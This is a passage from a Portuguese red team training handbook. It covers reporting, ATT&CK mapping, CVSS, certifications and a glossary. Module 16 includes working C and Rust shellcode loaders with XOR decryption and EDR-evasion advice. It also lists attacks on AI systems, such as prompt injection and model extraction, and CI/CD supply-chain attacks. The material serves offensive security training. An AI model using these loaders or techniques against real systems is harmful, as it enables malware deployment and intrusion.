Revisado em 2024.
Página 41 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
NIST SP 800-115 — [Link] → [Link]
14.1.4 MITRE ATT&CK — Mapeamento de TTPs
O MITRE ATT&CK v18.1 (outubro 2025) é a referência para mapeamento de TTPs utilizados. A versão
v18 introduziu a substituição de Detections por Detection Strategies e Analytics em todas as técnicas.
Estatísticas ATT&CK v18.1 Valores
Táticas Enterprise 14
Técnicas Enterprise 216
Sub-técnicas Enterprise 475
Grupos documentados 172
Detection Strategies 691
MITRE ATT&CK — [Link] → [Link]
14.2 Estrutura do Relatório de Red Team
Seção Conteúdo
Sumário Executivo Escopo, período, achados críticos, impacto, recomendações
prioritárias — máximo 2 páginas
Metodologia Framework adotado, fases executadas, ferramentas, limitações
Escopo e Rules of Engagement Sistemas autorizados, janelas, restrições, contatos
Narrativa de Ataque (Kill Chain) Linha do tempo completa — Initial Access → Impact
Mapeamento MITRE ATT&CK Heatmap de TTPs utilizados — ATT&CK Navigator
Achados Técnicos Detalhados Título, severidade CVSS v4, descrição, evidência, impacto,
reprodução, remediação
Análise de Detecção e O que o Blue Team detectou, o que não detectou, MTTD, MTTR
Resposta
Recomendações Priorizadas Quick Wins vs. melhorias estruturais — com esforço estimado
Apêndices Logs completos, screenshots, hashes, código de PoC, timeline
detalhado
14.3 CVSS v4.0 — Classificação de Severidade
O CVSS v4.0 (lançado em novembro de 2023) é o padrão atual. Substitui o v3.1 com novos grupos de
métricas: Base, Threat e Environmental. Ainda amplamente usado em paralelo ao v3.1 em ferramentas
de mercado.
Score CVSS Severidade
0.0 None
Página 42 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
0.1 – 3.9 Low
4.0 – 6.9 Medium
7.0 – 8.9 High
9.0 – 10.0 Critical
14.4 Ferramentas de Gestão e Tracking
• ATT&CK Navigator — heatmap interativo de TTPs ([Link]/resources/attack-navigator)
• VECTR ([Link]) — plataforma de tracking de Purple/Red Team exercises com relatórios
• Atomic Red Team ([Link]/redcanaryco/atomic-red-team) — testes unitários por técnica
ATT&CK
• CALDERA ([Link]/mitre/caldera) — plataforma de automação de adversary emulation
14.5 Comunicação com Stakeholders
• Relatório executivo: foco em impacto de negócio, risco financeiro e reputacional — sem jargão
técnico
• Relatório técnico: evidências completas, reprodução passo a passo, CVSS, remediação
• Nunca usar termos como 'sistema comprometido' sem contextualizar o impacto real de negócio
• Apresentar ROI da remediação em comparação ao custo estimado de um incidente real
equivalente
Página 43 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 15 — TRILHA DE CERTIFICAÇÕES 2026
15.1 Roadmap de Certificações
Fundamentos (Pré-Requisito)
Certificação Emissora Foco
CompTIA Network+ CompTIA Fundamentos de redes — pré-
(N10-009) requisito recomendado
CompTIA Security+ CompTIA Fundamentos de segurança —
(SY0-701) amplamente exigido
Blueprint Network+ N10-009 — [Link]/certifications/network →
[Link]
Blueprint Security+ SY0-701 — [Link]/certifications/security →
[Link]
Nível Iniciante / Entrada em Ofensivo
Certificação Emissora Foco
eJPT v2 INE/eLearnSecurity Pentest júnior — 100% prático,
excelente ponto de entrada
PNPT TCM Security Pentest prático com relatório real —
muito recomendado pela
comunidade
CompTIA PenTest+ CompTIA Pentest estruturado — alinhado a
(PT0-003) PTES e MITRE ATT&CK
Blueprint PenTest+ PT0-003 — [Link]/certifications/pentest →
[Link]
Nível Intermediário
Certificação Emissora Foco
OSCP (PEN-200) Offensive Security Pentest — padrão da indústria,
exige 24h de prova prática
CRTO (Red Team Ops I) Zero-Point Security Red Team com Cobalt Strike em
lab AD realístico
eCPPTv3 INE/eLearnSecurity Pentest profissional — web + redes
+ BoF
BSCP PortSwigger Burp Suite Certified Practitioner —
web application security
OSCP PEN-200 — [Link]/pwk-oscp/ → [Link]
CRTO — [Link] → [Link]
Página 44 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
Nível Avançado
Certificação Emissora Foco
OSEP (PEN-300) Offensive Security Evasion techniques, AD avançado,
AV bypass
OSED (EXP-301) Offensive Security Windows exploit development —
BOF, SEH, ROP
OSWE (WEB-300) Offensive Security Web application whitebox — source
code review
CRTE Altered Security AD e Azure Red Team avançado —
multi-forest
CRTO II Zero-Point Security Red Team Ops avançado —
evasão e infra
Trilha OSCP/OSEP/OSED/OSWE — [Link] → [Link]
certifications/
CRTE Altered Security — [Link] → [Link]
15.2 Recursos de Estudo
Recurso Tipo / Observação
TCM Security — Practical Curso pago — fundamento para PNPT
Ethical Hacking
PortSwigger Web Security Totalmente gratuito — referência para web hacking
Academy
HackTheBox Academy Módulos estruturados do iniciante ao avançado
TryHackMe — Red Teaming Trilha guiada — bom para iniciantes
Path
Sektor7 — Malware Desenvolvimento de malware e evasão de EDR
Development
Altered Security — AD Active Directory Red Team — presencial e online
Bootcamp
Professor Messer (YouTube) Network+ e Security+ em vídeo — gratuito
Jeremy's IT Lab (YouTube) CCNA 200-301 completo — gratuito
Referências Online Essenciais
MITRE ATT&CK v18 — [Link] → [Link]
LOLBAS Project — [Link] → [Link]
GTFOBins — [Link] → [Link]
PayloadsAllTheThings — [Link]/swisskyrepo → [Link]
HackTricks — [Link] → [Link]
Página 45 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
Red Team Notes — [Link] → [Link]
NetExec — [Link]/Pennyw0rth/NetExec → [Link]
BloodHound CE — [Link] → [Link]
PTES — [Link] → [Link]
OWASP Top 10 2025 — [Link]/Top10/ → [Link]
Página 46 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 16 — TÓPICOS AVANÇADOS 2026
16.1 Desenvolvimento de Malware para Red Team
16.1.1 Shellcode Loader em C — XOR Decrypt + VirtualAlloc
#include <windows.h>
#include <string.h>
void xor_decrypt(unsigned char *buf, int len, unsigned char key) {
for (int i = 0; i < len; i++) buf[i] ^= key;
}
int main() {
unsigned char shellcode[] = { 0xXX, 0xXX /* shellcode aqui */ };
int len = sizeof(shellcode);
xor_decrypt(shellcode, len, 0xDE); // Chave XOR
LPVOID mem = VirtualAlloc(NULL, len, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!mem) return 1;
memcpy(mem, shellcode, len);
((void(*)())mem)();
return 0;
}
⚠️ OPSEC — PAGE_EXECUTE_READWRITE
A alocação com PAGE_EXECUTE_READWRITE é um IoC (Indicator of Compromise)
detectado por EDRs modernos. Em operações reais, dividir em duas chamadas:
VirtualAlloc com PAGE_READWRITE, copiar shellcode, e depois VirtualProtect para
PAGE_EXECUTE_READ.
16.1.2 Implants em Rust (Tendência 2025–2026)
Rust oferece vantagens para malware development: ausência de runtime .NET (menos detecção),
controle fino de memória, cross-compilation e dificuldade de reversão. Adotado por grupos APT reais
em 2024-2025.
use std::ptr;
use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect};
use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_READWRITE, PAGE_EXECUTE_READ};
fn main() {
let shellcode: Vec<u8> = vec![/* bytes */];
unsafe {
let mem = VirtualAlloc(ptr::null_mut(), [Link](),
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
ptr::copy(shellcode.as_ptr(), mem as *mut u8, [Link]());
let mut old = 0u32;
VirtualProtect(mem, [Link](), PAGE_EXECUTE_READ, &mut old);
Página 47 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
let f: extern "C" fn() = std::mem::transmute(mem);
f();
}
}
16.2 AI/ML Red Team (2026)
Vetor Descrição
Prompt Injection Direta Manipular LLMs via input crafted pelo usuário
Indirect Prompt Injection Injeção via dados externos processados pelo LLM (PDFs, emails,
páginas web)
Model Extraction Reconstruir modelo via queries sistemáticas — extração de IP
Voice Cloning para Vishing Síntese de voz em tempo real para impersonação em ataques
dirigidos
Spear Phishing assistido por AI Conteúdo de engenharia social personalizado com dados de
OSINT
MITRE ATLAS — TTPs para ataques a sistemas AI/ML — [Link] → [Link]
16.3 CI/CD Pipeline Attacks
Vetor Técnica
GitHub Actions — Pwn Request PR de fork acessa secrets do repositório pai se workflow usa
pull_request_target sem restrição
NPM / PyPI Typosquatting Pacote com nome similar ao legítimo — supply chain via
dependência
Docker Hub — Imagem Imagem com backdoor em registry público ou comprometido
Maliciosa
Terraform Registry Módulo malicioso publicado imitando módulo legítimo
Dependabot Abuse PRs automatizados para injetar mudanças no fluxo de aprovação
16.4 Adversary Emulation — APT Simulation
Adversary Emulation replica TTPs documentados de grupos APT específicos, diferindo do Red Team
genérico pela fidelidade ao adversário real. Usar planos de emulação publicados pelo MITRE CTI.
Grupo APT Característica Principal Referência
APT29 (Cozy Bear) Spear phishing + WMI + LOTL + MITRE ATT&CK APT29 +
persistência discreta CALDERA plan
Lazarus Group BYOVD + malware customizado em ATT&CK G0032
C/Rust + cryptojacking
Página 48 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
Volt Typhoon 100% LOTL — sem malware — CISA Advisory AA23-144A
proxy network via SOHO routers
LockBit 3.0 Ransomware + dupla extorsão + CISA #StopRansomware LockBit
afiliados distribuídos
# CALDERA — adversary emulation automatizado
git clone [Link] && cd caldera
pip3 install -r [Link]
python3 [Link] --insecure
# Acessar: [Link] (admin/admin por padrão — alterar imediatamente)
Página 49 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 17 — GLOSSÁRIO E REFERÊNCIAS
17.1 Glossário Técnico
Termo Sigla Definição
Active Directory AD Serviço de diretório da Microsoft
para autenticação e autorização em
redes Windows
Adversary Emulation AE Replicação fiel de TTPs de um
grupo APT específico em um
exercício controlado
Adversary in the Middle AiTM Proxy que intercepta autenticação
real capturando tokens de sessão
— bypassa MFA
Advanced Persistent APT Ameaça sofisticada com acesso
Threat persistente, furtivo e objetivos
estratégicos de longo prazo
Assumed Breach AB Avaliação que parte do pressuposto
de comprometimento já existente
Beacon Object File BOF Código compilado que executa na
memória do beacon sem criar novo
processo
Bring Your Own BYOVD Carregar driver legítimo e
Vulnerable Driver vulnerável para executar código no
kernel e desabilitar EDR
Command and Control C2 Infraestrutura de comunicação
entre operador e sistemas
comprometidos
Crown Jewels CJ Ativos de maior valor para a
organização — objetivo final de
Red Team operation
Defense Evasion DE Técnicas para evitar detecção por
AV, EDR, SIEM e analistas
Domain Controller DC Servidor central do AD que
gerencia autenticação Kerberos e
NTLM do domínio
Endpoint Detection and EDR Solução de segurança com
Response telemetria comportamental e
capacidade de resposta em
endpoint
Living Off the Land LOTL Uso de binários e ferramentas
legítimas do SO para execução de
ações maliciosas
NTLM Relay — Captura de desafio NTLM e
retransmissão para outro serviço
em nome da vítima
Página 50 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
Operational Security OPSEC Práticas para proteger identidade,
técnicas e infraestrutura do
operador
Pass-the-Hash PtH Autenticação com hash NTLM sem
necessidade de senha em texto
claro
Purple Team — Exercício colaborativo Red+Blue
para validar e melhorar detecções
em tempo real
Rules of Engagement RoE Documento que define escopo,
autorizações e restrições de um
engajamento
Tactics, Techniques, TTP Forma de operar de um adversário
Procedures — base do framework MITRE
ATT&CK
Zero-Day 0day Vulnerabilidade desconhecida pelo
fabricante e sem patch disponível
17.2 Referências e Links Verificados
Recurso URL
MITRE ATT&CK v18.1 [Link]
MITRE ATLAS (AI/ML) [Link]
OWASP Top 10 2025 [Link]/Top10/
OWASP WSTG v4.2 [Link]/www-project-web-security-testing-guide/
PTES [Link]
OSSTMM v3 [Link]/[Link]
NIST SP 800-115 [Link]/publications/detail/sp/800-115/final
Unified Kill Chain [Link]
LOLBAS Project [Link]
GTFOBins [Link]
PayloadsAllTheThings [Link]/swisskyrepo/PayloadsAllTheThings
HackTricks [Link]
Red Team Notes [Link]
NetExec [Link]/Pennyw0rth/NetExec
NetExec Wiki [Link]
BloodHound CE Quickstart [Link]/get-started/quickstart/community-edition-
quickstart
Certipy [Link]/ly4k/Certipy
Impacket [Link]/fortra/impacket
Página 51 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
Sliver C2 [Link]/BishopFox/sliver
GOAD [Link]/Orange-Cyberdefense/GOAD
SysWhispers3 [Link]/klezVirus/SysWhispers3
Atomic Red Team [Link]/redcanaryco/atomic-red-team
CALDERA [Link]/mitre/caldera
VECTR [Link]
SecLists (wordlists) [Link]/danielmiessler/SecLists
CompTIA Network+ N10-009 [Link]/certifications/network
CompTIA Security+ SY0-701 [Link]/certifications/security
CompTIA PenTest+ PT0-003 [Link]/certifications/pentest
CCNA 200-301 Blueprint [Link]/c/en/us/training-events/training-
certifications/exams/current-list/[Link]
OSCP PEN-200 [Link]/pwk-oscp/
CRTO Zero-Point Security [Link]
CRTE Altered Security [Link]
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Be Safe — Mariana BS | Edição 2026 — Revisado
Material protegido. Reprodução somente com autorização expressa.
Página 52 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS